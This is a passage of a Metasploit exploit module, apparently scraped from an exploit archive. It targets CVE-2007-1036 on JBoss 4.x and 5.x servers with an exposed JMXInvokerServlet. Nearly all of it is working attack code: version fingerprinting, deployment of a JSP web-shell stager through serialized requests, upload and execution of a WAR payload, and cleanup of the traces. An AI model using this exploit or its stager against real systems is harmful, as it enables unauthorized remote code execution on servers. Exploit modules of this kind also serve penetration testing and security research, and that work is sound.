ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /JBoss/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',\r\n 'Description' => %q{\r\n This module can be used to execute a payload on JBoss servers that have an\r\n exposed HTTPAdaptor's JMX Invoker exposed on the \"JMXInvokerServlet\". By invoking\r\n the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed\r\n to finally upload the selected payload to the target. The DeploymentFileRepository\r\n methods are only available on Jboss 4.x and 5.x.\r\n },\r\n 'Author' => [\r\n 'Patrick Hof', # Vulnerability discovery, analysis and PoC\r\n 'Jens Liebchen', # Vulnerability discovery, analysis and PoC\r\n 'h0ng10' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2007-1036' ],\r\n [ 'OSVDB', '33744' ],\r\n [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],\r\n ],\r\n 'DisclosureDate' => 'Feb 20 2007',\r\n 'Privileged' => true,\r\n 'Platform' => ['java', 'win', 'linux' ],\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'Targets' =>\r\n [\r\n\r\n # do target detection but java meter by default\r\n [ 'Automatic',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n }\r\n ],\r\n\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n },\r\n ],\r\n\r\n #\r\n # Platform specific targets\r\n #\r\n [ 'Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n },\r\n ],\r\n\r\n [ 'Linux x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n },\r\n ],\r\n ],\r\n\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),\r\n OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),\r\n OptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]),\r\n ], self.class)\r\n\r\n end\r\n\r\n def check\r\n res = send_serialized_request('version.bin')\r\n if (res.nil?) or (res.code != 200)\r\n print_error(\"Unable to request version, returned http code is: #{res.code.to_s}\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n # Check if the version is supported by this exploit\r\n return Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/\r\n return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/\r\n return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/\r\n\r\n if res.body =~ /ServletException/ # Simple check, if we caused an exception.\r\n print_status(\"Target seems vulnerable, but the used JBoss version is not supported by this exploit\")\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n mytarget = target\r\n\r\n if (target.name =~ /Automatic/)\r\n mytarget = auto_target\r\n fail_with(\"Unable to automatically select a target\") if not mytarget\r\n print_status(\"Automatically selected target: \\\"#{mytarget.name}\\\"\")\r\n else\r\n print_status(\"Using manually select target: \\\"#{mytarget.name}\\\"\")\r\n end\r\n\r\n\r\n # We use a already serialized stager to deploy the final payload\r\n regex_stager_app_base = rand_text_alpha(14)\r\n regex_stager_jsp_name = rand_text_alpha(14)\r\n name_parameter = rand_text_alpha(8)\r\n content_parameter = rand_text_alpha(8)\r\n stager_uri = \"/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp\"\r\n stager_code = \"A\" * 810 # 810 is the size of the stager in the serialized request\r\n\r\n replace_values = {\r\n 'regex_app_base' => regex_stager_app_base,\r\n 'regex_jsp_name' => regex_stager_jsp_name,\r\n stager_code => generate_stager(name_parameter, content_parameter)\r\n }\r\n\r\n print_status(\"Deploying stager\")\r\n send_serialized_request('installstager.bin', replace_values)\r\n print_status(\"Calling stager: #{stager_uri}\")\r\n call_uri_mtimes(stager_uri, 5, 'GET')\r\n\r\n # Generate the WAR with the payload which will be uploaded through the stager\r\n app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))\r\n jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))\r\n\r\n war_data = payload.encoded_war({\r\n :app_name => app_base,\r\n :jsp_name => jsp_name,\r\n :arch => mytarget.arch,\r\n :platform => mytarget.platform\r\n }).to_s\r\n\r\n b64_war = Rex::Text.encode_base64(war_data)\r\n print_status(\"Uploading payload through stager\")\r\n res = send_request_cgi({\r\n 'uri' => stager_uri,\r\n 'method' => \"POST\",\r\n 'vars_post' =>\r\n {\r\n name_parameter => app_base,\r\n content_parameter => b64_war\r\n }\r\n }, 20)\r\n\r\n payload_uri = \"/#{app_base}/#{jsp_name}.jsp\"\r\n print_status(\"Calling payload: \" + payload_uri)\r\n res = call_uri_mtimes(payload_uri,5, 'GET')\r\n\r\n # Remove the payload through stager\r\n print_status(\"Removing payload through stager\")\r\n delete_payload_uri = stager_uri + \"?#{name_parameter}=#{app_base}\"\r\n res = send_request_cgi(\r\n {'uri' => delete_payload_uri,\r\n })\r\n\r\n # Remove the stager\r\n print_status(\"Removing stager\")\r\n send_serialized_request('removestagerfile.bin', replace_values)\r\n send_serialized_request('removestagerdirectory.bin', replace_values)\r\n\r\n handler\r\n end\r\n\r\n def generate_stager(name_param, content_param)\r\n war_file = rand_text_alpha(4+rand(4))\r\n file_content = rand_text_alpha(4+rand(4))\r\n jboss_home = rand_text_alpha(4+rand(4))\r\n decoded_content = rand_text_alpha(4+rand(4))\r\n path = rand_text_alpha(4+rand(4))\r\n fos = rand_text_alpha(4+rand(4))\r\n name = rand_text_alpha(4+rand(4))\r\n file = rand_text_alpha(4+rand(4))\r\n\r\n stager_script = <<-EOT\r\n<%@page import=\"java.io.*,\r\n java.util.*,\r\n sun.misc.BASE64Decoder\"\r\n%>\r\n<%\r\nString #{file_content} = \"\";\r\nString #{war_file} = \"\";\r\nString #{jboss_home} = System.getProperty(\"jboss.server.home.dir\");\r\nif (request.getParameter(\"#{content_param}\") != null){\r\ntry {\r\n#{file_content} = request.getParameter(\"#{content_param}\");\r\n#{war_file} = request.getParameter(\"#{name_param}\");\r\nbyte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content});\r\nString #{path} = #{jboss_home} + \"/deploy/\" + #{war_file} + \".war\";\r\nFileOutputStream #{fos} = new FileOutputStream(#{path});\r\n#{fos}.write(#{decoded_content});\r\n#{fos}.close();\r\n}\r\ncatch(Exception e) {}\r\n}\r\nelse {\r\ntry{\r\nString #{name} = request.getParameter(\"#{name_param}\");\r\nString #{file} = #{jboss_home} + \"/deploy/\" + #{name} + \".war\";\r\nnew File(#{file}).delete();\r\n}\r\ncatch(Exception e) {}\r\n}\r\n\r\n%>\r\nEOT\r\n\r\n # The script must be exactly 810 characters long, otherwise we might have serialization issues\r\n # Therefore we fill the rest wit spaces\r\n spaces = \" \" * (810 - stager_script.length)\r\n stager_script << spaces\r\n end\r\n\r\n\r\n def send_serialized_request(file_name , replace_params = {})\r\n path = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"jboss_jmxinvoker\", \"DeploymentFileRepository\", file_name)\r\n data = File.open( path, \"rb\" ) { |fd| data = fd.read(fd.stat.size) }\r\n\r\n replace_params.each { |key, value| data.gsub!(key, value) }\r\n\r\n res = send_request_cgi({\r\n 'uri' => target_uri.path,\r\n 'method' => 'POST',\r\n 'data' => data,\r\n 'headers' =>\r\n {\r\n 'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation',\r\n 'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2'\r\n }\r\n }, 25)\r\n\r\n\r\n if (not res) or (res.code != 200)\r\n print_error(\"Failed: Error requesting preserialized request #{file_name}\")\r\n return nil\r\n end\r\n\r\n res\r\n end\r\n\r\n\r\n def call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil)\r\n # JBoss might need some time for the deployment. Try 5 times at most and\r\n # wait 5 seconds inbetween tries\r\n num_attempts.times do |attempt|\r\n if (verb == \"POST\")\r\n res = send_request_cgi(\r\n {\r\n 'uri' => uri,\r\n 'method' => verb,\r\n 'data' => data\r\n }, 5)\r\n else\r\n uri += \"?#{data}\" unless data.nil?\r\n res = send_request_cgi(\r\n {\r\n 'uri' => uri,\r\n 'method' => verb\r\n }, 30)\r\n end\r\n\r\n msg = nil\r\n if (!res)\r\n msg = \"Execution failed on #{uri} [No Response]\"\r\n elsif (res.code < 200 or res.code >= 300)\r\n msg = \"http request failed to #{uri} [#{res.code}]\"\r\n elsif (res.code == 200)\r\n print_status(\"Successfully called '#{uri}'\") if datastore['VERBOSE']\r\n return res\r\n end\r\n\r\n if (attempt < num_attempts - 1)\r\n msg << \", retrying in 5 seconds...\"\r\n print_status(msg) if datastore['VERBOSE']\r\n select(nil, nil, nil, 5)\r\n else\r\n print_error(msg)\r\n return res\r\n end\r\n end\r\n end\r\n\r\n\r\n def auto_target\r\n print_status(\"Attempting to automatically select a target\")\r\n\r\n plat = detect_platform()\r\n arch = detect_architecture()\r\n\r\n return nil if (not arch or not plat)\r\n\r\n # see if we have a match\r\n targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }\r\n\r\n # no matching target found\r\n return nil\r\n end\r\n\r\n\r\n # Try to autodetect the target platform\r\n def detect_platform\r\n print_status(\"Attempting to automatically detect the platform\")\r\n res = send_serialized_request(\"osname.bin\")\r\n\r\n if (res.body =~ /(Linux|FreeBSD|Windows)/i)\r\n os = $1\r\n if (os =~ /Linux/i)\r\n return 'linux'\r\n elsif (os =~ /FreeBSD/i)\r\n return 'linux'\r\n elsif (os =~ /Windows/i)\r\n return 'win'\r\n end\r\n end\r\n nil\r\n end\r\n\r\n\r\n # Try to autodetect the architecture\r\n def detect_architecture()\r\n print_status(\"Attempting to automatically detect the architecture\")\r\n res = send_serialized_request(\"osarch.bin\")\r\n if (res.body =~ /(i386|x86)/i)\r\n arch = $1\r\n if (arch =~ /i386|x86/i)\r\n return ARCH_X86\r\n # TODO, more\r\n end\r\n end\r\n nil\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19327"}]}}